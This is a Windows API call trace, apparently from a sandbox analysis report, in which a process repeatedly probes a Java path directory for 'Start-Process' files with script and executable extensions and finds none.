	[0058.124] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.124] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.ps1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.ps1", lpFilePart=0x0) returned 0x35
	[0058.124] GetFullPathNameW (in: lpFileName="Start-Process.ps1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.ps1", lpFilePart=0x0) returned 0x2b
	[0058.124] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.ps1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.125] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.125] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.126] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.126] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.psm1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.psm1", lpFilePart=0x0) returned 0x36
	[0058.126] GetFullPathNameW (in: lpFileName="Start-Process.psm1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.psm1", lpFilePart=0x0) returned 0x2c
	[0058.126] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.psm1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.126] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.126] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.127] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.127] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.psd1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.psd1", lpFilePart=0x0) returned 0x36
	[0058.127] GetFullPathNameW (in: lpFileName="Start-Process.psd1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.psd1", lpFilePart=0x0) returned 0x2c
	[0058.127] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.psd1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.127] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.127] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.128] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.128] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.COM", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.COM", lpFilePart=0x0) returned 0x35
	[0058.128] GetFullPathNameW (in: lpFileName="Start-Process.COM", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.COM", lpFilePart=0x0) returned 0x2b
	[0058.128] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.COM", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.128] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.128] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.129] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.129] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.EXE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.EXE", lpFilePart=0x0) returned 0x35
	[0058.129] GetFullPathNameW (in: lpFileName="Start-Process.EXE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.EXE", lpFilePart=0x0) returned 0x2b
	[0058.129] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.EXE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.129] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.129] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.129] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.129] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.BAT", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.BAT", lpFilePart=0x0) returned 0x35
	[0058.130] GetFullPathNameW (in: lpFileName="Start-Process.BAT", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.BAT", lpFilePart=0x0) returned 0x2b
	[0058.130] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.BAT", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.130] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.130] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.130] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.130] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.CMD", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.CMD", lpFilePart=0x0) returned 0x35
	[0058.131] GetFullPathNameW (in: lpFileName="Start-Process.CMD", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.CMD", lpFilePart=0x0) returned 0x2b
	[0058.131] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.CMD", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.131] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.131] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.131] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.131] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.VBS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.VBS", lpFilePart=0x0) returned 0x35
	[0058.131] GetFullPathNameW (in: lpFileName="Start-Process.VBS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.VBS", lpFilePart=0x0) returned 0x2b
	[0058.131] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.VBS", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.132] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.132] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.132] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.132] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.VBE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.VBE", lpFilePart=0x0) returned 0x35
	[0058.132] GetFullPathNameW (in: lpFileName="Start-Process.VBE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.VBE", lpFilePart=0x0) returned 0x2b
	[0058.132] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.VBE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.133] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.133] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.133] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.133] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.JS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.JS", lpFilePart=0x0) returned 0x34
	[0058.133] GetFullPathNameW (in: lpFileName="Start-Process.JS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.JS", lpFilePart=0x0) returned 0x2a
	[0058.133] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.JS", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.134] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.134] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.134] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.134] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.JSE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.JSE", lpFilePart=0x0) returned 0x35
	[0058.134] GetFullPathNameW (in: lpFileName="Start-Process.JSE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.JSE", lpFilePart=0x0) returned 0x2b
	[0058.134] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.JSE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.135] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.135] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.135] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.135] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.WSF", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.WSF", lpFilePart=0x0) returned 0x35
	[0058.135] GetFullPathNameW (in: lpFileName="Start-Process.WSF", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.WSF", lpFilePart=0x0) returned 0x2b
	[0058.135] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Start-Process.WSF", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.136] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
